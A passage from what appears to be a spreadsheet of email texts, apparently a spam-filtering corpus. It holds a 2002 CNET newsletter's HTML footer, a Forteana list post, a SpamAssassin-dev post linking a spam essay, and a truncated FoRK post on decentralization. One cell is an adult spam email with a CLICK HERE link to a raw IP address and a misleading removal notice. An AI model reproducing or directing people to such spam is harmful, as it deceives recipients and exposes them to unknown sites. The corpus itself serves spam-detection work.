 =09&lt;td&gt;&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"10" height=3D"1" al=
 t=3D"" border=3D"0" /&gt;&lt;/td&gt;
 =09&lt;td&gt;&lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;&lt;img src=3D"http://=
 home.cnet.com/b.gif" width=3D"1" height=3D"5" alt=3D"" border=3D"0" /&gt;&lt;br /=
 &gt;
 =09&lt;font face=3D"arial, helvetica" color=3D"#666666" size=3D"-1"&gt;&lt;b&gt;Most po=
 pular&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1" h=
 eight=3D"5" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;
 =09&lt;b&gt;Desktops&lt;/b&gt;&lt;br /&gt;&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1"=
  height=3D"7" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;
 =091. &lt;a href=3D"http://clickthru.online.com/Click?q=3Df5-lTbRQgwx1jamoZg6D=
 mLwgkaZmRuR" &gt;Dell Dimension 4400&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://home.cnet.com=
 /b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;
 =092. &lt;a href=3D"http://clickthru.online.com/Click?q=3D0a-ZnKCIrrscy9q3rUBw=
 hq6GOxuYzsR" &gt;Sony VAIO PCV-RX650&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://home.cnet.com=
 /b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;
 =093. &lt;a href=3D"http://clickthru.online.com/Click?q=3D1f-rvwqI58w5nHc5A01x=
 mYgHobjqmZR" &gt;Dell Dimension 4400 for Home&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://home=
 .cnet.com/b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;
 =094. &lt;a href=3D"http://clickthru.online.com/Click?q=3D34-pJpSIcd81RqArU33_=
 tvVyn4IcgdR" &gt;Dell Dimension 8200&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://home.cnet.com=
 /b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;
 =095. &lt;a href=3D"http://clickthru.online.com/Click?q=3D49-ZM4cIEpSeyU90gbVX=
 4RVXFO5JSrR" &gt;Dell Optiplex GX240&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://home.cnet.com=
 /b.gif" width=3D"1" height=3D"6" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;
 =09&lt;img src=3D"http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width=3D"13" he=
 ight=3D"13" border=3D"0" alt=3D"" align=3D"absmiddle" /&gt; &lt;b&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3D5e-ssGdIn06t0yIdenhsnStcVTQzciR" &gt;See all=
  most popular&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
 =09&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1" height=3D"10" alt=3D=
 "" border=3D"0" /&gt;&lt;br /&gt;
 =09&lt;/font&gt;&lt;/td&gt;
 =09&lt;td&gt;&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"10" height=3D"1" al=
 t=3D"" border=3D"0" /&gt;&lt;/td&gt;
 =09&lt;td bgcolor=3D"#666666"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" width=3D=
 "1" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;
 =09&lt;/tr&gt;
 =09&lt;tr&gt;&lt;td colspan=3D"5" bgcolor=3D"#666666"&gt;&lt;img src=3D"http://home.cnet.c=
 om/b.gif" width=3D"1" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;&lt;/tr&gt;
 =09&lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr valign=3D"top"&gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " height=3D5 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3D"7" bgcolor=3D"#cccccc"&gt;&lt;img src=3D"http://home.cnet.com/=
 b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /Leads Module --&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;
 &lt;font face=3D"Arial, Helvetica"&gt;=09=09=09
 &lt;img src=3D"http://www.cnet.com/i/nl/sh/sub_feat.gif" alt=3D"Review" width=
 =3D"150" height=3D"19" border=3D"0"&gt;&lt;br&gt;
 &lt;img src=3D"http://home.cnet.com/i/nl/rule.gif" width=3D"410" height=3D"8" =
 border=3D"0"&gt;&lt;br&gt;
 &lt;!-- Reviews gif=20
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D93 align=3Dleft&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src=3D"http://a.r.tv.com/cnet.1d/i/p/082801ie6.jpg" width=3D"8=
 5" height=3D"110" border=3D"0"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 End Reviews gif --&gt;
 &lt;font face=3D"arial, helvetica"&gt;&lt;b&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D74-VAV8IZZSNagNWyQRYG8Y0gS=
 PZxnR" &gt;This week in Internet Services&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 Big broadband providers are ticked off about Wi-Fi hot spots.
 In fact, both AT&amp;amp;T Broadband and Time Warner Cable have begun
 campaigns to stop subscribers from sharing their accounts with
 others at no charge. Also this week: we review Yahoo"s new
 dial-up service.
 &lt;/font&gt;&lt;p&gt;
 &lt;font face=3D"arial, helvetica"&gt;&lt;b&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D89-h28bQ-J1Q02IDqlkUMBXB6W=
 5WWcR" &gt;Is your ISP safe from hackers?&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 Surely, the folks who run your ISP have thought good and hard
 about security issues, but should you count on their skills to
 ward off intruders? Not wise, says our ISP expert. In this
 week"s column, Dan Tynan takes security matters into his own
 hands and shows you how to protect yourself.
 &lt;/font&gt;&lt;p&gt;
 &lt;p&gt;
 &lt;!-- Scoop --&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/ws/sub_scoop.gif" width=3D150 height=
 =3D19 alt=3D"The Scoop"&gt;&lt;br&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/rule.gif" width=3D410 height=3D8&gt;&lt;br&gt;
 &lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D9e-tWQoQtMQJbivW7oHSCN0=
 U7nQUDRR" &gt;Domain names&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 A domain name provides an online identity and contact point for
 your business, organization, or project. Almost every transaction
 on the Internet relies upon a domain name to conduct commerce,
 display Web pages, deliver e-mail, and more. Secure your own
 domain here.
 &lt;/font&gt;&lt;br&gt;
 &lt;!-- End Scoop --&gt;
 &lt;br&gt;
 &lt;p&gt;
 &lt;!-- this week --&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/ws/sub_news.gif" width=3D150 height=3D=
 19 alt=3D"This Week in News"&gt;&lt;br&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/rule.gif" width=3D410 height=3D8&gt;&lt;br&gt;
 &lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Db3-QHzxQYKTqPwMqy4AE64q=
 DAwrPGFR" &gt;&lt;b&gt;Comcast shareholders bless AT&amp;T deal&lt;/b&gt;&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 Comcast shareholders on Wednesday approved the cable television
 company's $27 billion purchase of larger rival AT&amp;T Broadband,
 which will create the nation's largest cable TV operator with
 more than 22 million customers.
 &lt;/font&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dc8-2lPnQWOzdKSAi4xMKE-n=
 Fr99H29R" &gt;U.S. Attorney investigates Qwest=20
 &lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 Qwest Communications International, the number-four U.S. local
 telephone carrier, said Wednesday that the U.S. Attorney's office
 in Denver has begun a criminal investigation of the company.
 &lt;/font&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;!-- CNET WEEKLY tip --&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/ws/sub_tip.gif" width=3D150 height=3D1=
 9 alt=3D"Tip of the Week"&gt;&lt;br&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/rule.gif" width=3D410 height=3D8&gt;&lt;br&gt;
 &lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Ddd-tpm0QzWd3KwOlvmGZP85=
 eXsJh-uR" &gt;Antivirus guide 2002&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 You want to protect your PC, of course. But how? We"ll walk you
 through some of your best antivirus options. Our reviewers
 looked at 10 top antivirus products and sorted out the features
 and levels of protection found in each.
 &lt;br&gt;
 &lt;/font&gt;
 &lt;br&gt;
 &lt;p&gt;
 &lt;img src=3D"http://home.cnet.com/i/dp/oncnet.gif" alt=3D"On the CNET Networ=
 k" width=3D"172" height=3D"14" border=3D"0"&gt;&lt;br&gt;
 &lt;img src=3D"http://home.cnet.com/i/nl/rule.gif" width=3D"410" height=3D"8" =
 border=3D"0"&gt;&lt;br&gt;
 &lt;table width=3D"410" cellpadding=3D0 cellspacing=3D0 border=3D0&gt;&lt;tr valign=
 =3Dtop&gt;
 &lt;td&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;b&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Df2-OZVTQUwWCP2AgW10pvV=
 di5Z7edsR" &gt;Tech Trends&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D07-HqCzI5rq9XaOumHiqzU=
 brvLkiDZR" &gt;Hardware&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D1c-cs_iIFr43L2_OlNn9kg=
 Ga2oXqGdR" &gt;Software&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D31-V_YRIjMsDVYpq0uyLxj=
 kqVAXXbcR" &gt;Shopping&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D46-19zwInpDS3qrjRaa1cN=
 0535V0YiR" &gt;Downloads&lt;/a&gt;
 &lt;/ul&gt;&lt;b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;b&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D5c-BnjPIZnPbrLr5mC53xl=
 Zk0f-IonR" &gt;News&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D71-GwdUIEZcfByHz91qwuB=
 Xvl3NU2rR" &gt;Investing&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D86-8fH1QCJonygfpsvSjae=
 TldfVpfRR" &gt;Electronics&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D9b-7-TFQSIo2xWnzLn0dAV=
 J9PZAKTFR" &gt;Web Building&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Db0-NZmfQQJr-Y4bf_XdxQM=
 KtNX8PQ9R" &gt;Help &amp; How-Tos&lt;/a&gt;
 &lt;/ul&gt;&lt;b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;b&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dc5-8BcDQzOaFArP3YTzSRO=
 UJEymxquR" &gt;Internet&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dda-dT8jQUPq_yH_t95bjsM=
 VKpv3DxsR" &gt;Games&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Def-04uYQmkHvcw52NIqBxD=
 VAmoBamZR" &gt;Message Boards&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D04-k9W0IFQXF_UJZRS98Bb=
 BL7kOi_dR" &gt;CNET Radio&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D19-BLe0I2rXOlvEd1FKMZ2=
 Fz8IR7XcR" &gt;Music Center&lt;/a&gt;
 &lt;/ul&gt;&lt;b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!-- Begin search box --&gt;
 =09&lt;table border=3D"0" cellpadding=3D"1" cellspacing=3D"0" width=3D"90%"&gt;&lt;t=
 r&gt;&lt;td bgcolor=3D"#CCCCCC"&gt;
 =09&lt;table border=3D0 cellspacing=3D0 cellpadding=3D0 width=3D"100%"&gt;&lt;form m=
 ethod=3D"GET" action=3D"http://www.search.com/redirect"&gt;
 =09&lt;tr align=3Dcenter valign=3Dmiddle bgcolor=3D"#FFFFFF"&gt;
 =09&lt;td height=3D40 align=3Dright nowrap&gt; &lt;/td&gt;
 =09&lt;td class=3D"f"&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;b&gt;Search&lt;/b=
 &gt; &lt;/font&gt;&lt;/td&gt;
 =09&lt;td align=3Dleft&gt;&lt;input type=3D"Text" class=3D"f" name=3D"qt" size=3D"12=
 " maxlength=3D"255"&gt;&lt;/td&gt;
 =09&lt;td&gt; &lt;select name=3D"target"&gt;
 =09&lt;option value=3D"http://internet.search.com/search?tag=3Dex.is.lrg.srch.=
 is&amp;sortby=3Dcompany%252Cservice&amp;join=3Dand&amp;keywords=3D%25%25q%25%25" select=
 ed&gt; Internet Services
 =09&lt;option value=3D"http://cnet.search.com/search?edition=3Dcnet&amp;cat=3D103&amp;=
 timeout=3D3&amp;tag=3Dex.ws.sr.srch_top.cnet"&gt;All CNET
 =09&lt;option value=3D"http://www.search.com/search?channel=3D1&amp;tag=3Dex.ws.sr=
 .srch_top.web"&gt;The Web=09
 =09&lt;/select&gt;&lt;/font&gt;&lt;/center&gt;&lt;/td&gt;
 =09&lt;td&gt; &lt;input name=3D'search' type=3D'submit' class=3D'f' value=3D' Go! '&gt;=
 =20
 =09&lt;input type=3D"hidden" name=3D"tt" value=3D"st.sw.8888.sbsr"&gt;&lt;/td&gt;
 =09&lt;/tr&gt;&lt;/form&gt;
 =09&lt;/table&gt;=20
 =09&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;=20
 &lt;!-- End search box --&gt;
 &lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1" height=3D"8" border=3D"=
 0"&gt;&lt;br&gt;
 =09=09&lt;/td&gt;
 =09&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- Thin grey line --&gt;
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D612&gt;
 &lt;tr valign=3Dtop&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D10 bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" width=3D"10" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D599 bgcolor=3D"#CCCCCC"&gt;&lt;img src=3D"http://home.cnet.com/b.g=
 if" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D612&gt;
 &lt;tr valign=3Dtop&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D10 bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" width=3D"10" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D600 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.g=
 if" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table width=3D"612" bgcolor=3D"#000000" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" heig=
 ht=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"599" bgcolor=3D"#cccccc"&gt;&lt;img src=3D"http://www.cnet.com/b.gif=
 " width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#eeeeee" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.g=
 if" width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"12"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"12" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"575"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"10"&gt;&lt;br&gt;
 &lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dqqqqqqqqqq-cnet-news=
 letters@example.com&amp;brand=3Dcnet'&gt;
 &lt;img src=3D"http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width=3D"375" height=3D"=
 18" border=3D"0" alt=3D"Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;=
 br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-cnet-newsletter=
 s@example.com&lt;p&gt;
 &lt;A NOTRACK HREF=3D'http://clickthru.online.com/Click?q=3D2f-hYfFzInu3VK3rW5=
 M2V22j7XLQtJgy9RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dqqqqqqqqqq-cne=
 t-newsletters@example.com&amp;brand=3Dcnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D44-9nxfIZUtYw=
 3DuzAEMLKlXBDgnVnR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D59-y53oIEnthwdesBklp=
 W-B_KMqztrR" &gt;Advertise&lt;/A&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!-- /subscription management--&gt;
 &lt;/font&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=3D"8"&gt;&lt;/td=
 &gt;
 &lt;td width=3D"12"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"12" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#000000" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" heig=
 ht=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"601"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#ffcc00" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.g=
 if" width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"10" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"37"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D6f-3x79IO=
 LAbHgqPca3RXvLF34ULXPR" &gt;&lt;img src=3D"http://www.cnet.com/i/dp/smrb.gif" wid=
 th=3D"37" height=3D"37" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D"563" nowrap&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D84-CCOyQ60TyzpZTgMZsihsBSW=
 gp7dR" &gt;&lt;font color=3D"#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D99-4mtyQAdTjI4jtH02H3f2jvr=
 qULcR" &gt;&lt;font color=3D"#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dae-jOE6QMB1Lkl2_0N8-mhe2RY=
 EVuRR" &gt;&lt;font color=3D"#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dc3-x1yCQJLx-_UPW2fZ5znP-Fd=
 WuuFR" &gt;&lt;font color=3D"#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dd8-XW73QWLWI7jud7imkSWreAg=
 RDc9R" &gt;&lt;font color=3D"#000000"&gt;All CNET services&lt;/font&gt;&lt;/a&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" cellpadding=3D"0" cellspacing=3D"0" border=3D"0"&gt;
 &lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D=
 "1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td height=3D"25"&gt;&lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;&lt;tab=
 le width=3D100% border=3D0 cellspacing=3D2 cellpadding=3D1&gt; &lt;tr valign=3Dbo=
 ttom&gt; &lt;td width=3D75% height=3D31&gt; &lt;p&gt;&lt;/font&gt; &lt;br&gt;&lt;b&gt;&lt;font face=3DArial, He=
 lvetica, sans-serif size=3D2&gt;    Copyright 2002 CNET Networks, Inc. All rig=
 hts reserved.    &lt;/font&gt;&lt;/b&gt; &lt;/p&gt;&lt;/td&gt;&lt;td height=3D31 valign=3Dtop&gt; &lt;div al=
 ign=3Dright&gt; &lt;img src=3D"http://gserv-cnet.zdnet.com/clear/outbound.gif?APP=
 ID=3D2&amp;EMID=3D25136487&amp;NL=3De425&amp;ISSUE=3D2002-07-11" height=3D1 width=3D1&gt; =
    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, san=
 s-serif size=3D2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3Dee-Z=
 bxW-CDsh4678RHPr7GzhmjzGRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] FWD (SK) Japanese tentacle porn [was Re: Com'on Baby, Lite my Fire]
</t>
  </si>
  <si>
    <t xml:space="preserve">"Leonard R. Cleavelin" wrote:
 &gt;Scat I have, unfortunately, run across. But this is the second reference I've 
 &gt;seen in as many weeks to "Japanese tentacle porn", which is a genre I've 
 &gt;lived in complete (and probably blissful) ignorance of until now. Unless it's 
 &gt;going to gross out a significant percentage of the readership of the list, 
 &gt;can we have a definition/description? Some of us lead sheltered lives.
 &lt; http://www.abcb.com/ency/t/tentacle.htm &gt;
 Now, isn't your life just SOOOO much more enriched?
 Dave Palmer
 -- 
 Terry W. Colvin, Sierra Vista, Arizona (USA) &lt; fortean1@mindspring.com &gt;
      Alternate: &lt; fortean1@msn.com &gt;
 Home Page: &lt; http://www.geocities.com/Area51/Stargate/8958/index.html &gt;
 Sites: * Fortean Times * Mystic's Haven * TLCB *
       U.S. Message Text Formatting (USMTF) Program
 ------------
 Member: Thailand-Laos-Cambodia Brotherhood (TLCB) Mailing List
    TLCB Web Site: &lt; http://www.tlc-brotherhood.org &gt;[Vietnam veterans,
 Allies, CIA/NSA, and "steenkeen" contractors are welcome.]
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] Interesting approach to Spam handling..
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, have you seen and discussed this article and his approach?
 Thank you
 http://www.paulgraham.com/spam.html
 -- "Hell, there are no rules here-- we're trying to accomplish something."
 -- Thomas Alva Edison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</si>
  <si>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Adult Photos, Movies, Chat, Videos, Cams, Games and More. It's FREE...
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;100% Free Porn!&lt;br&gt;
 What more can you ask for?&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font size="4"&gt;&lt;a href="http://216.129.174.178/"&gt;CLICK HERE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;REMOVAL INSTRUCTIONS: We strive to never send unsolicited mail.&lt;br&gt;
 However, if you'd rather not receive future e-mails from us,&lt;br&gt;
 &lt;a href="mailto:cheech@inbox.lv"&gt;CLICK HERE&lt;/a&gt; to send email and add the word REMOVE in the subject line.&lt;br&gt;
 Please allow 48 hours for processing.&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [FRYTE^3247(^(PO1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: why is decentralization worth worrying about?
</t>
  </si>
  <si>
    <t xml:space="preserve">Rohit Khare wrote:
 &gt; 
 &gt; Why am I so passionate about decentralization? Because I believe some of
 &gt; today?s most profound problems with networked applications are caused by
 &gt; centralization.
 &gt; 
 &gt; Generically, a centralized political or economic system permits only one
 &gt; answer to a question, while decentralization permits many separate
 &gt; agents to hold different opinions of the same matter. In the specific
